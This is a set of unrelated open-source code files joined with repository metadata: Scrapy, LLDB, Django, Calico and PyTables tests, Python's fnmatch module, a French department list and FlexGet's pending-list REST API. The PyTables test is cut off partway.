from scrapy.http import Response, Request
from scrapy.spider import BaseSpider
from scrapy.contrib.spidermiddleware.httperror import HttpErrorMiddleware, HttpError


class TestHttpErrorMiddleware(TestCase):
    """Unit tests for HttpErrorMiddleware.

    The middleware raises HttpError for non-2xx responses on
    process_spider_input, unless the request/spider opted in via
    ``handle_httpstatus_list``.
    """

    def setUp(self):
        # One shared spider/middleware pair plus a 200 and a 404 response,
        # both tied to the same request.
        self.spider = BaseSpider('foo')
        self.mw = HttpErrorMiddleware()
        self.req = Request('http://scrapytest.org')
        self.res200 = Response('http://scrapytest.org', status=200)
        self.res200.request = self.req
        self.res404 = Response('http://scrapytest.org', status=404)
        self.res404.request = self.req

    def test_process_spider_input(self):
        """A 200 passes through; a 404 raises HttpError."""
        # assertEquals is a deprecated alias -> use assertIsNone/assertEqual.
        self.assertIsNone(self.mw.process_spider_input(self.res200, self.spider))
        self.assertRaises(HttpError, self.mw.process_spider_input,
                          self.res404, self.spider)

    def test_process_spider_exception(self):
        """HttpError is swallowed (empty result); other exceptions propagate (None)."""
        self.assertEqual([], self.mw.process_spider_exception(
            self.res404, HttpError(self.res404), self.spider))
        self.assertIsNone(self.mw.process_spider_exception(
            self.res404, Exception(), self.spider))

    def test_handle_httpstatus_list(self):
        """404 is allowed through when whitelisted via request meta or spider attribute."""
        res = self.res404.copy()
        res.request = Request('http://scrapytest.org',
                              meta={'handle_httpstatus_list': [404]})
        self.assertIsNone(self.mw.process_spider_input(res, self.spider))

        self.spider.handle_httpstatus_list = [404]
        self.assertIsNone(self.mw.process_spider_input(self.res404, self.spider))
bsd-3-clause
apple/llvm-project
lldb/test/API/commands/expression/static-initializers/TestStaticInitializers.py
4
1627
"""Test that LLDB's expression evaluator can run C++ static initializers
injected via top-level expressions (``expr -p``)."""

import lldb
from lldbsuite.test.decorators import *
from lldbsuite.test.lldbtest import *
from lldbsuite.test import lldbutil


class StaticInitializers(TestBase):

    mydir = TestBase.compute_mydir(__file__)

    # Known failure on aarch64 freebsd/linux; see the linked LLVM bug.
    @expectedFailureAll(archs="aarch64", oslist=["freebsd", "linux"],
                        bugnumber="https://bugs.llvm.org/show_bug.cgi?id=44053")
    def test(self):
        """ Test a static initializer. """
        self.build()

        # Stop at the '// break here' marker in main.cpp so a process exists
        # for the injected code to run in.
        lldbutil.run_to_source_breakpoint(self, '// break here',
                                          lldb.SBFileSpec("main.cpp", False))

        # We use counter to observe if the initializer was called.
        self.expect_expr("counter", result_type="int", result_value="0")
        # Declaring a global Foo at top level should run Foo's constructor,
        # which bumps the counter.
        self.expect("expr -p -- struct Foo { Foo() { inc_counter(); } }; Foo f;")
        self.expect_expr("counter", result_type="int", result_value="1")

    def test_failing_init(self):
        """ Test a static initializer that fails to execute. """
        self.build()

        lldbutil.run_to_source_breakpoint(self, '// break here',
                                          lldb.SBFileSpec("main.cpp", False))

        # The initializer aborts; the expression command must surface an error
        # rather than crash.
        # FIXME: This error message is not even remotely helpful.
        self.expect("expr -p -- struct Foo2 { Foo2() { do_abort(); } }; Foo2 f;",
                    error=True,
                    substrs=["error: couldn't run static initializer:"])

    def test_without_process(self):
        """ Test a static initializer without a running process. """
        # No self.build()/breakpoint here on purpose: with no runnable target,
        # injecting top-level code with an initializer must be rejected.
        self.expect("expr -p -- int i = 0; struct Foo3 { Foo3() { ++i; } }; Foo3 f;",
                    error=True,
                    substrs=["Top-level code needs to be inserted into a runnable target"])
apache-2.0
3quarterstack/simple_blog
django/contrib/localflavor/fr/fr_department.py
109
3687
# -*- coding: utf-8 -*- # See the "Code officiel géographique" on the INSEE website <www.insee.fr>. from __future__ import unicode_literals DEPARTMENT_CHOICES = ( # Metropolitan departments ('01', '01 - Ain'), ('02', '02 - Aisne'), ('03', '03 - Allier'), ('04', '04 - Alpes-de-Haute-Provence'), ('05', '05 - Hautes-Alpes'), ('06', '06 - Alpes-Maritimes'), ('07', '07 - Ardèche'), ('08', '08 - Ardennes'), ('09', '09 - Ariège'), ('10', '10 - Aube'), ('11', '11 - Aude'), ('12', '12 - Aveyron'), ('13', '13 - Bouches-du-Rhône'), ('14', '14 - Calvados'), ('15', '15 - Cantal'), ('16', '16 - Charente'), ('17', '17 - Charente-Maritime'), ('18', '18 - Cher'), ('19', '19 - Corrèze'), ('2A', '2A - Corse-du-Sud'), ('2B', '2B - Haute-Corse'), ('21', '21 - Côte-d\'Or'), ('22', '22 - Côtes-d\'Armor'), ('23', '23 - Creuse'), ('24', '24 - Dordogne'), ('25', '25 - Doubs'), ('26', '26 - Drôme'), ('27', '27 - Eure'), ('28', '28 - Eure-et-Loir'), ('29', '29 - Finistère'), ('30', '30 - Gard'), ('31', '31 - Haute-Garonne'), ('32', '32 - Gers'), ('33', '33 - Gironde'), ('34', '34 - Hérault'), ('35', '35 - Ille-et-Vilaine'), ('36', '36 - Indre'), ('37', '37 - Indre-et-Loire'), ('38', '38 - Isère'), ('39', '39 - Jura'), ('40', '40 - Landes'), ('41', '41 - Loir-et-Cher'), ('42', '42 - Loire'), ('43', '43 - Haute-Loire'), ('44', '44 - Loire-Atlantique'), ('45', '45 - Loiret'), ('46', '46 - Lot'), ('47', '47 - Lot-et-Garonne'), ('48', '48 - Lozère'), ('49', '49 - Maine-et-Loire'), ('50', '50 - Manche'), ('51', '51 - Marne'), ('52', '52 - Haute-Marne'), ('53', '53 - Mayenne'), ('54', '54 - Meurthe-et-Moselle'), ('55', '55 - Meuse'), ('56', '56 - Morbihan'), ('57', '57 - Moselle'), ('58', '58 - Nièvre'), ('59', '59 - Nord'), ('60', '60 - Oise'), ('61', '61 - Orne'), ('62', '62 - Pas-de-Calais'), ('63', '63 - Puy-de-Dôme'), ('64', '64 - Pyrénées-Atlantiques'), ('65', '65 - Hautes-Pyrénées'), ('66', '66 - Pyrénées-Orientales'), ('67', '67 - Bas-Rhin'), ('68', '68 - Haut-Rhin'), ('69', '69 - Rhône'), 
('70', '70 - Haute-Saône'), ('71', '71 - Saône-et-Loire'), ('72', '72 - Sarthe'), ('73', '73 - Savoie'), ('74', '74 - Haute-Savoie'), ('75', '75 - Paris'), ('76', '76 - Seine-Maritime'), ('77', '77 - Seine-et-Marne'), ('78', '78 - Yvelines'), ('79', '79 - Deux-Sèvres'), ('80', '80 - Somme'), ('81', '81 - Tarn'), ('82', '82 - Tarn-et-Garonne'), ('83', '83 - Var'), ('84', '84 - Vaucluse'), ('85', '85 - Vendée'), ('86', '86 - Vienne'), ('87', '87 - Haute-Vienne'), ('88', '88 - Vosges'), ('89', '89 - Yonne'), ('90', '90 - Territoire de Belfort'), ('91', '91 - Essonne'), ('92', '92 - Hauts-de-Seine'), ('93', '93 - Seine-Saint-Denis'), ('94', '94 - Val-de-Marne'), ('95', '95 - Val-d\'Oise'), # Overseas departments, communities, and other territories ('971', '971 - Guadeloupe'), ('972', '972 - Martinique'), ('973', '973 - Guyane'), ('974', '974 - La Réunion'), ('975', '975 - Saint-Pierre-et-Miquelon'), ('976', '976 - Mayotte'), ('977', '977 - Saint-Barthélemy'), ('978', '978 - Saint-Martin'), ('984', '984 - Terres australes et antarctiques françaises'), ('986', '986 - Wallis et Futuna'), ('987', '987 - Polynésie française'), ('988', '988 - Nouvelle-Calédonie'), ('989', '989 - Île de Clipperton'), )
mit
benjaminrigaud/django
tests/model_package/tests.py
29
2538
"""Regression tests for Django models defined inside sub-packages
(``models/`` as a package rather than a single ``models.py``)."""

from __future__ import unicode_literals

from django.contrib.sites.models import Site
from django.db import models
from django.test import TestCase

from .models.publication import Publication
from .models.article import Article


class Advertisement(models.Model):
    # Model declared in the *test* package itself (not under models/);
    # exercised by the #12245 regression below.
    customer = models.CharField(max_length=100)
    publications = models.ManyToManyField("model_package.Publication", blank=True)


class ModelPackageTests(TestCase):
    def test_model_packages(self):
        """Models split across a models sub-package behave like normal models:
        M2M tables are created, test-package models work, and autogenerated
        through-model field/column names carry no package path component."""
        p = Publication.objects.create(title="FooBar")
        current_site = Site.objects.get_current()
        self.assertEqual(current_site.domain, "example.com")

        # Regression for #12168: models split into subpackages still get M2M
        # tables
        a = Article.objects.create(headline="a foo headline")
        a.publications.add(p)
        a.sites.add(current_site)
        a = Article.objects.get(id=a.pk)
        self.assertEqual(a.id, a.pk)
        self.assertEqual(a.sites.count(), 1)

        # Regression for #12245 - Models can exist in the test package, too
        ad = Advertisement.objects.create(customer="Lawrence Journal-World")
        ad.publications.add(p)
        ad = Advertisement.objects.get(id=ad.pk)
        self.assertEqual(ad.publications.count(), 1)

        # Regression for #12386 - field names on the autogenerated intermediate
        # class that are specified as dotted strings don't retain any path
        # component for the field or column name
        self.assertEqual(
            Article.publications.through._meta.fields[1].name, 'article'
        )
        self.assertEqual(
            Article.publications.through._meta.fields[1].get_attname_column(),
            ('article_id', 'article_id')
        )
        self.assertEqual(
            Article.publications.through._meta.fields[2].name, 'publication'
        )
        self.assertEqual(
            Article.publications.through._meta.fields[2].get_attname_column(),
            ('publication_id', 'publication_id')
        )

        # The oracle backend truncates the name to 'model_package_article_publ233f'.
        self.assertTrue(
            Article._meta.get_field('publications').m2m_db_table() in
            ('model_package_article_publications', 'model_package_article_publ233f')
        )

        self.assertEqual(
            Article._meta.get_field('publications').m2m_column_name(), 'article_id'
        )
        self.assertEqual(
            Article._meta.get_field('publications').m2m_reverse_name(),
            'publication_id'
        )
bsd-3-clause
barbarubra/Don-t-know-What-i-m-doing.
python/src/Lib/fnmatch.py
194
3019
"""Filename matching with shell patterns.

fnmatch(FILENAME, PATTERN) matches according to the local convention.
fnmatchcase(FILENAME, PATTERN) always takes case in account.

The functions operate by translating the pattern into a regular
expression.  They cache the compiled regular expressions for speed.

The function translate(PATTERN) returns a regular expression
corresponding to PATTERN.  (It does not compile it.)
"""
# Imports hoisted to module level: the originals did per-call
# "import os" inside each function, which is pure overhead.
import os
import posixpath
import re

# NOTE: "filter" deliberately shadows the builtin; it is the module's
# historical public API (listed in __all__) and cannot be renamed.
__all__ = ["filter", "fnmatch", "fnmatchcase", "translate"]

# Cache of pattern -> compiled regex.  Grows without bound; callers with
# unbounded pattern sets should clear it themselves.
_cache = {}


def fnmatch(name, pat):
    """Test whether FILENAME matches PATTERN.

    Patterns are Unix shell style:

    *       matches everything
    ?       matches any single character
    [seq]   matches any character in seq
    [!seq]  matches any char not in seq

    An initial period in FILENAME is not special.
    Both FILENAME and PATTERN are first case-normalized
    if the operating system requires it.
    If you don't want this, use fnmatchcase(FILENAME, PATTERN).
    """
    name = os.path.normcase(name)
    pat = os.path.normcase(pat)
    return fnmatchcase(name, pat)


def filter(names, pat):
    """Return the subset of the list NAMES that match PAT"""
    result = []
    pat = os.path.normcase(pat)
    if pat not in _cache:
        _cache[pat] = re.compile(translate(pat))
    match = _cache[pat].match
    if os.path is posixpath:
        # normcase on posix is NOP. Optimize it away from the loop.
        for name in names:
            if match(name):
                result.append(name)
    else:
        for name in names:
            if match(os.path.normcase(name)):
                result.append(name)
    return result


def fnmatchcase(name, pat):
    """Test whether FILENAME matches PATTERN, including case.

    This is a version of fnmatch() which doesn't case-normalize
    its arguments.
    """
    if pat not in _cache:
        _cache[pat] = re.compile(translate(pat))
    return _cache[pat].match(name) is not None


def translate(pat):
    """Translate a shell PATTERN to a regular expression.

    There is no way to quote meta-characters.
    """
    i, n = 0, len(pat)
    res = ''
    while i < n:
        c = pat[i]
        i = i + 1
        if c == '*':
            res = res + '.*'
        elif c == '?':
            res = res + '.'
        elif c == '[':
            j = i
            # '!' (negation) and a leading ']' are literal at the start of a
            # character class, so skip them before scanning for the close.
            if j < n and pat[j] == '!':
                j = j + 1
            if j < n and pat[j] == ']':
                j = j + 1
            while j < n and pat[j] != ']':
                j = j + 1
            if j >= n:
                # Unterminated class: treat '[' as a literal.
                res = res + '\\['
            else:
                stuff = pat[i:j].replace('\\', '\\\\')
                i = j + 1
                if stuff[0] == '!':
                    stuff = '^' + stuff[1:]
                elif stuff[0] == '^':
                    stuff = '\\' + stuff
                res = '%s[%s]' % (res, stuff)
        else:
            res = res + re.escape(c)
    # BUG FIX: the original anchored with res + "$", but '$' also matches
    # just before a trailing newline, so e.g. 'foo\n' wrongly matched 'foo'.
    # Anchor with \Z and scope DOTALL so '*'/'?' can span newlines, matching
    # the upstream CPython fix.
    return '(?s:%s)\\Z' % res
apache-2.0
Danfocus/Flexget
flexget/components/managed_lists/lists/pending_list/api.py
4
10945
# REST API for FlexGet's "pending list" managed list: CRUD on lists and on
# the entries they contain, plus approve/reject state changes on entries.
from __future__ import unicode_literals, division, absolute_import
from builtins import *  # pylint: disable=unused-import, redefined-builtin

import copy
import logging
from math import ceil

from flask import jsonify, request
from sqlalchemy.orm.exc import NoResultFound

from flexget.api import api, APIResource
from flexget.api.app import (
    NotFoundError,
    base_message_schema,
    success_response,
    etag,
    pagination_headers,
    Conflict,
    BadRequest,
)

from . import db

log = logging.getLogger('pending_list')

pending_list_api = api.namespace('pending_list', description='Pending List operations')


class ObjectsContainer(object):
    # JSON-schema dicts used to document and validate the API payloads below.
    pending_list_base_object = {
        'type': 'object',
        'properties': {
            'id': {'type': 'integer'},
            'name': {'type': 'string'},
            'added_on': {'type': 'string'},
        },
    }

    # Input schema is the base schema minus the server-assigned fields.
    pending_list_input_object = copy.deepcopy(pending_list_base_object)
    del pending_list_input_object['properties']['id']
    del pending_list_input_object['properties']['added_on']

    pending_list_return_lists = {'type': 'array', 'items': pending_list_base_object}

    base_entry_object = {
        'type': 'object',
        'properties': {
            'title': {'type': 'string'},
            'original_url': {'type': 'string'},
            'approved': {'type': 'boolean'},
        },
        'required': ['title', 'original_url'],
        'additionalProperties': True,
    }

    pending_list_entry_base_object = {
        'type': 'object',
        'properties': {
            'id': {'type': 'integer'},
            'name': {'type': 'string'},
            'added_on': {'type': 'string'},
            'title': {'type': 'string'},
            'original_url': {'type': 'string'},
            'approved': {'type': 'boolean'},
            'entry': base_entry_object,
        },
    }

    # Body of PUT .../entries/<id>/: exactly one of 'approve' / 'reject'.
    operation_object = {
        'type': 'object',
        'properties': {'operation': {'type': 'string', 'enum': ['approve', 'reject']}},
        'required': ['operation'],
        'additionalProperties': False,
    }

    pending_lists_entries_return_object = {
        'type': 'array',
        'items': pending_list_entry_base_object,
    }


pending_list_object_schema = api.schema_model(
    'pending_list.return_list', ObjectsContainer.pending_list_base_object
)
pending_list_input_object_schema = api.schema_model(
    'pending_list.input_list', ObjectsContainer.pending_list_input_object
)
pending_list_return_lists_schema = api.schema_model(
    'pending_list.return_lists', ObjectsContainer.pending_list_return_lists
)
pending_list_operation_schema = api.schema_model(
    'pending_list.operation_schema', ObjectsContainer.operation_object
)

list_parser = api.parser()
list_parser.add_argument('name', help='Filter results by list name')


@pending_list_api.route('/')
class PendingListListsAPI(APIResource):
    # Collection resource: enumerate all pending lists / create a new one.
    @etag
    @api.doc(parser=list_parser)
    @api.response(200, 'Successfully retrieved pending lists', pending_list_return_lists_schema)
    def get(self, session=None):
        """ Get pending lists """
        args = list_parser.parse_args()
        name = args.get('name')
        pending_lists = [
            pending_list.to_dict()
            for pending_list in db.get_pending_lists(name=name, session=session)
        ]
        return jsonify(pending_lists)

    @api.validate(pending_list_input_object_schema)
    @api.response(201, model=pending_list_object_schema)
    @api.response(Conflict)
    def post(self, session=None):
        """ Create a new pending list """
        data = request.json
        name = data.get('name')
        # List names must be unique: a successful exact-name lookup is a 409.
        try:
            db.get_list_by_exact_name(name=name, session=session)
        except NoResultFound:
            pass
        else:
            raise Conflict('list with name \'%s\' already exists' % name)
        pending_list = db.PendingListList()
        pending_list.name = name
        session.add(pending_list)
        session.commit()
        resp = jsonify(pending_list.to_dict())
        resp.status_code = 201
        return resp


@pending_list_api.route('/<int:list_id>/')
@api.doc(params={'list_id': 'ID of the list'})
class PendingListListAPI(APIResource):
    # Single-list resource addressed by numeric ID.
    @etag
    @api.response(NotFoundError)
    @api.response(200, model=pending_list_object_schema)
    def get(self, list_id, session=None):
        """ Get pending list by ID """
        try:
            # NOTE(review): local name shadows the builtin 'list'; kept as-is.
            list = db.get_list_by_id(list_id=list_id, session=session)
        except NoResultFound:
            raise NotFoundError('list_id %d does not exist' % list_id)
        return jsonify(list.to_dict())

    @api.response(200, description='list successfully deleted', model=base_message_schema)
    @api.response(NotFoundError)
    def delete(self, list_id, session=None):
        """ Delete pending list by ID """
        try:
            db.delete_list_by_id(list_id=list_id, session=session)
        except NoResultFound:
            raise NotFoundError('list_id %d does not exist' % list_id)
        return success_response('list successfully deleted')


base_entry_schema = api.schema_model('base_entry_schema', ObjectsContainer.base_entry_object)
pending_list_entry_base_schema = api.schema_model(
    'pending_list.entry_base_schema', ObjectsContainer.pending_list_entry_base_object
)
pending_lists_entries_return_schema = api.schema_model(
    'pending_list.entry_return_schema', ObjectsContainer.pending_lists_entries_return_object
)

sort_choices = ('id', 'added', 'title', 'original_url', 'list_id', 'approved')
entries_parser = api.pagination_parser(sort_choices=sort_choices, default='title')
entries_parser.add_argument('filter', help='Filter by title name')


@pending_list_api.route('/<int:list_id>/entries/')
@api.doc(params={'list_id': 'ID of the list'}, parser=entries_parser)
@api.response(NotFoundError)
class PendingListEntriesAPI(APIResource):
    # Collection of entries inside one pending list, with pagination/sorting.
    @etag
    @api.response(200, model=pending_lists_entries_return_schema)
    def get(self, list_id, session=None):
        """ Get entries by list ID """
        try:
            # NOTE(review): local name shadows the builtin 'list'; kept as-is.
            list = db.get_list_by_id(list_id=list_id, session=session)
        except NoResultFound:
            raise NotFoundError('list_id %d does not exist' % list_id)
        args = entries_parser.parse_args()

        # Pagination and sorting params
        page = args['page']
        per_page = args['per_page']
        sort_by = args['sort_by']
        sort_order = args['order']
        filter_ = args['filter']

        # Handle max size limit
        if per_page > 100:
            per_page = 100

        start = per_page * (page - 1)
        stop = start + per_page
        descending = sort_order == 'desc'

        kwargs = {
            'start': start,
            'stop': stop,
            'list_id': list_id,
            'order_by': sort_by,
            'descending': descending,
            'filter': filter_,
            'session': session,
        }

        total_items = list.entries.count()

        if not total_items:
            return jsonify([])

        log.debug('pending lists entries count is %d', total_items)
        entries = [entry.to_dict() for entry in db.get_entries_by_list_id(**kwargs)]

        # Total number of pages
        total_pages = int(ceil(total_items / float(per_page)))

        if page > total_pages:
            raise NotFoundError('page %s does not exist' % page)

        # Actual results in page
        actual_size = min(len(entries), per_page)

        # Get pagination headers
        pagination = pagination_headers(total_pages, total_items, actual_size, request)

        # Create response
        rsp = jsonify(entries)

        # Add link header to response
        rsp.headers.extend(pagination)
        return rsp

    @api.validate(base_entry_schema)
    @api.response(
        201, description='Successfully created entry object', model=pending_list_entry_base_schema
    )
    @api.response(Conflict)
    def post(self, list_id, session=None):
        """ Create a new entry object"""
        try:
            db.get_list_by_id(list_id=list_id, session=session)
        except NoResultFound:
            raise NotFoundError('list_id %d does not exist' % list_id)
        data = request.json
        title = data.get('title')
        # Titles are unique within a list; an existing match is a 409.
        entry_object = db.get_entry_by_title(list_id=list_id, title=title, session=session)
        if entry_object:
            raise Conflict('entry with title \'%s\' already exists' % title)
        entry_object = db.PendingListEntry(entry=data, pending_list_id=list_id)
        if data.get('approved'):
            entry_object.approved = data['approved']
        session.add(entry_object)
        session.commit()
        response = jsonify(entry_object.to_dict())
        response.status_code = 201
        return response


@pending_list_api.route('/<int:list_id>/entries/<int:entry_id>/')
@api.doc(params={'list_id': 'ID of the list', 'entry_id': 'ID of the entry'})
@api.response(NotFoundError)
class PendingListEntryAPI(APIResource):
    # Single entry addressed by (list_id, entry_id).
    @etag
    @api.response(200, model=pending_list_entry_base_schema)
    def get(self, list_id, entry_id, session=None):
        """ Get an entry by list ID and entry ID """
        try:
            entry = db.get_entry_by_id(list_id=list_id, entry_id=entry_id, session=session)
        except NoResultFound:
            raise NotFoundError('could not find entry with id %d in list %d' % (entry_id, list_id))
        return jsonify(entry.to_dict())

    @api.response(200, model=base_message_schema)
    def delete(self, list_id, entry_id, session=None):
        """ Delete an entry by list ID and entry ID """
        try:
            entry = db.get_entry_by_id(list_id=list_id, entry_id=entry_id, session=session)
        except NoResultFound:
            raise NotFoundError('could not find entry with id %d in list %d' % (entry_id, list_id))
        log.debug('deleting movie %d', entry.id)
        session.delete(entry)
        return success_response('successfully deleted entry %d' % entry.id)

    @api.response(201, model=pending_list_entry_base_schema)
    @api.validate(model=pending_list_operation_schema)
    @api.doc(description='Approve or reject an entry\'s status')
    def put(self, list_id, entry_id, session=None):
        """Sets entry object's pending status"""
        try:
            entry = db.get_entry_by_id(list_id=list_id, entry_id=entry_id, session=session)
        except NoResultFound:
            raise NotFoundError('could not find entry with id %d in list %d' % (entry_id, list_id))
        data = request.json
        approved = data['operation'] == 'approve'
        operation_text = 'approved' if approved else 'pending'
        # Re-applying the current state is rejected as a 400, not a no-op.
        if entry.approved is approved:
            raise BadRequest('Entry with id {} is already {}'.format(entry_id, operation_text))
        entry.approved = approved
        session.commit()
        rsp = jsonify(entry.to_dict())
        rsp.status_code = 201
        return rsp
mit
johscheuer/calico-docker
calico_containers/tests/unit/diags_test.py
6
8204
# Copyright 2015 Metaswitch Networks
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

# Unit tests for calico_ctl.diags.save_diags.  Every external effect
# (subprocess, filesystem, sh commands, etcd, tarfile) is mock-patched, so
# the tests only verify the sequence of calls save_diags makes.
import unittest
from mock import patch, Mock, call, ANY
from sh import Command, CommandNotFound
from pycalico.datastore import DatastoreClient
from etcd import EtcdResult, EtcdException, Client

from calico_ctl import diags


class TestDiags(unittest.TestCase):
    # NOTE: the @patch decorators are applied bottom-up, so the mock
    # parameters below are listed in the reverse order of the decorators.
    @patch('calico_ctl.diags.tempfile', autospec=True)
    @patch('os.mkdir', autospec=True)
    @patch('os.path.isdir', autospec=True)
    @patch('calico_ctl.diags.datetime', autospec=True)
    @patch('__builtin__.open', autospec=True)
    @patch('socket.gethostname', autospec=True)
    @patch('sh.Command._create', spec=Command)
    @patch('calico_ctl.diags.copytree', autospec=True)
    @patch('tarfile.open', autospec=True)
    @patch('calico_ctl.diags.DatastoreClient', autospec=True)
    @patch('calico_ctl.diags.subprocess', autospec=True)
    def test_save_diags(self, m_subprocess, m_DatastoreClient,
                        m_tarfile_open, m_copytree, m_sh_command,
                        m_socket, m_open, m_datetime, os_path_isdir,
                        m_os_mkdir, m_tempfile):
        """
        Test save_diags for calicoctl diags command
        """
        # Set up mock objects
        m_tempfile.mkdtemp.return_value = '/temp/dir'
        date_today = '2015-7-24_09_05_00'
        m_datetime.strftime.return_value = date_today
        m_socket.return_value = 'hostname'
        m_sh_command_return = Mock(autospec=True)
        m_sh_command.return_value = m_sh_command_return
        m_datetime.today.return_value = 'diags-07242015_090500.tar.gz'
        m_os_mkdir.return_value = True
        # The DatastoreClient contains an etcd Client
        # The etcd Client reads in a list of children of type EtcdResult
        # The children are accessed by calling get_subtree method on the etcd Client
        m_datastore_client = Mock(spec=DatastoreClient)
        m_datastore_client.etcd_client = Mock(spec=Client)
        m_datastore_data = Mock(spec=EtcdResult)
        m_child_1 = EtcdResult(node={'dir': True, 'key': 666})
        m_child_2 = EtcdResult(node={'key': 555, 'value': 999})
        m_datastore_data.get_subtree.return_value = [m_child_1, m_child_2]
        m_datastore_client.etcd_client.read.return_value = m_datastore_data
        m_DatastoreClient.return_value = m_datastore_client
        m_open.return_value = Mock()

        # Set up arguments
        log_dir = '/log/dir'
        temp_dir = '/temp/dir/'
        diags_dir = temp_dir + 'diagnostics'

        # Call method under test
        diags.save_diags(log_dir)

        # Assert
        m_subprocess.call.assert_called_once_with(
            ["docker", "exec", "calico-node", "pkill", "-SIGUSR1", "felix"])
        m_tempfile.mkdtemp.assert_called_once_with()
        m_os_mkdir.assert_called_once_with(diags_dir)
        # One diagnostics output file per data source.
        m_open.assert_has_calls([
            call(diags_dir + '/date', 'w'),
            call(diags_dir + '/hostname', 'w'),
            call(diags_dir + '/netstat', 'w'),
            call(diags_dir + '/route', 'w'),
            call(diags_dir + '/iptables', 'w'),
            call(diags_dir + '/ipset', 'w'),
            call(diags_dir + '/etcd_calico', 'w')
        ], any_order=True)
        self.assertEqual(m_open.return_value.close.call_count, 7)
        # Each shell tool is created via sh.Command._create then invoked.
        m_sh_command.assert_has_calls([
            call('netstat'),
            call()(all=True, numeric=True),
            call('route'),
            call()(numeric=True),
            call('ip'),
            call()('route'),
            call()('-6', 'route'),
            call('iptables-save'),
            call()(),
            call('ipset'),
            call()('list')
        ])
        m_datastore_client.etcd_client.read.assert_called_once_with(
            '/calico', recursive=True)
        m_copytree.assert_called_once_with(
            log_dir, diags_dir + '/logs', ignore=ANY)
        m_tarfile_open.assert_called_once_with(temp_dir + date_today, 'w:gz')

    @patch('calico_ctl.diags.tempfile', autospec=True)
    @patch('os.mkdir', autospec=True)
    @patch('os.path.isdir', autospec=True)
    @patch('calico_ctl.diags.datetime', autospec=True)
    @patch('__builtin__.open', autospec=True)
    @patch('socket.gethostname', autospec=True)
    @patch('sh.Command._create', spec=Command)
    @patch('calico_ctl.diags.copytree', autospec=True)
    @patch('tarfile.open', autospec=True)
    @patch('calico_ctl.diags.DatastoreClient', autospec=True)
    @patch('calico_ctl.diags.subprocess', autospec=True)
    def test_save_diags_exceptions(
            self, m_subprocess, m_DatastoreClient, m_tarfile_open,
            m_copytree, m_sh_command, m_socket, m_open, m_datetime,
            m_os_path_isdir, m_os_mkdir, m_tempfile):
        """
        Test all exception cases save_diags method in calicoctl diags command

        Raise CommandNotFound when sh.Command._create is called
        Raise EtcdException when trying to read from the etcd datastore
        Return false when trying to read logs from log directory
        """
        # Set up mock objects
        m_tempfile.mkdtemp.return_value = '/temp/dir'
        date_today = '2015-7-24_09_05_00'
        m_datetime.strftime.return_value = date_today
        m_socket.return_value = 'hostname'
        m_sh_command_return = Mock(autospec=True)
        m_sh_command.return_value = m_sh_command_return
        # Every shell-tool lookup fails; save_diags must keep going.
        m_sh_command.side_effect= CommandNotFound
        m_os_path_isdir.return_value = False
        m_datastore_client = Mock(spec=DatastoreClient)
        m_datastore_client.etcd_client = Mock(spec=Client)
        # etcd is unreachable; save_diags must keep going.
        m_datastore_client.etcd_client.read.side_effect = EtcdException
        m_DatastoreClient.return_value = m_datastore_client
        m_open.return_value = Mock()

        # Set up arguments
        log_dir = '/log/dir'
        temp_dir = '/temp/dir/'
        diags_dir = temp_dir + 'diagnostics'

        # Call method under test
        diags.save_diags(log_dir)

        # Assert
        m_subprocess.call.assert_called_once_with(
            ["docker", "exec", "calico-node", "pkill", "-SIGUSR1", "felix"])
        m_open.assert_has_calls([
            call(diags_dir + '/date', 'w'),
            call(diags_dir + '/hostname', 'w'),
            call(diags_dir + '/netstat', 'w'),
            call(diags_dir + '/route', 'w'),
            call(diags_dir + '/iptables', 'w'),
            call(diags_dir + '/ipset', 'w'),
            call(diags_dir + '/etcd_calico', 'w')
        ], any_order=True)
        m_open.return_value.write.assert_has_calls([
            call().__enter__().write('hostname'),
            call().__enter__().write('DATE=%s' % date_today)
        ], any_order=True)
        self.assertEqual(m_open.return_value.close.call_count, 7)
        # None of the command-output writes should have happened, since
        # every sh.Command lookup raised CommandNotFound.
        self.assertNotIn([
            call().__enter__().writelines(m_sh_command_return()),
            call().__enter__().write('route --numeric\n'),
            call().__enter__().writelines(m_sh_command_return()),
            call().__enter__().write('ip route\n'),
            call().__enter__().writelines(m_sh_command_return()),
            call().__enter__().write('ip -6 route\n'),
            call().__enter__().writelines(m_sh_command_return()),
            call().__enter__().writelines(m_sh_command_return()),
            call().__enter__().writelines(m_sh_command_return()),
            call(diags_dir + '/etcd_calico', 'w'),
            call().__enter__().write('dir?, key, value\n'),
            call().__enter__().write('DIR,  666,\n'),
            call().__enter__().write('FILE, 555, 999\n')
        ], m_open.mock_calls)
        self.assertFalse(m_copytree.called)
        m_tarfile_open.assert_called_once_with(temp_dir + date_today, 'w:gz')
apache-2.0
jack-pappas/PyTables
tables/tests/test_array.py
2
95560
# -*- coding: utf-8 -*-
# Round-trip tests for PyTables Array nodes: write a numpy array to an
# HDF5 file, read it back, and verify shape/dtype/byteorder/content.
from __future__ import print_function
import os
import sys
import tempfile
import warnings

import numpy
from numpy import testing as npt

import tables
from tables import Atom, ClosedNodeError, NoSuchNodeError
from tables.utils import byteorders
from tables.tests import common
from tables.tests.common import allequal
from tables.tests.common import unittest
from tables.tests.common import PyTablesTestCase as TestCase


warnings.resetwarnings()


class BasicTestCase(TestCase):
    """Basic test for all the supported typecodes present in numpy.

    All of them are included on pytables.

    """
    # Subclasses set endiancheck=True to additionally round-trip a
    # byte-swapped copy of the data.
    endiancheck = False

    def write_read(self, testarray):
        # Round-trip via File.create_array(obj=...) and Array.read().
        a = testarray
        if common.verbose:
            print('\n', '-=' * 30)
            print("Running test for array with type '%s'" % a.dtype.type,
                  end=' ')
            print("for class check:", self.title)

        # Create an instance of HDF5 file
        filename = tempfile.mktemp(".h5")
        try:
            with tables.open_file(filename, mode="w") as fileh:
                root = fileh.root

                # Create the array under root and name 'somearray'
                if self.endiancheck and a.dtype.kind != "S":
                    b = a.byteswap()
                    b.dtype = a.dtype.newbyteorder()
                    a = b

                fileh.create_array(root, 'somearray', a, "Some array")

            # Re-open the file in read-only mode
            with tables.open_file(filename, mode="r") as fileh:
                root = fileh.root

                # Read the saved array
                b = root.somearray.read()

                # Compare them. They should be equal.
                if common.verbose and not allequal(a, b):
                    print("Write and read arrays differ!")
                    # print("Array written:", a)
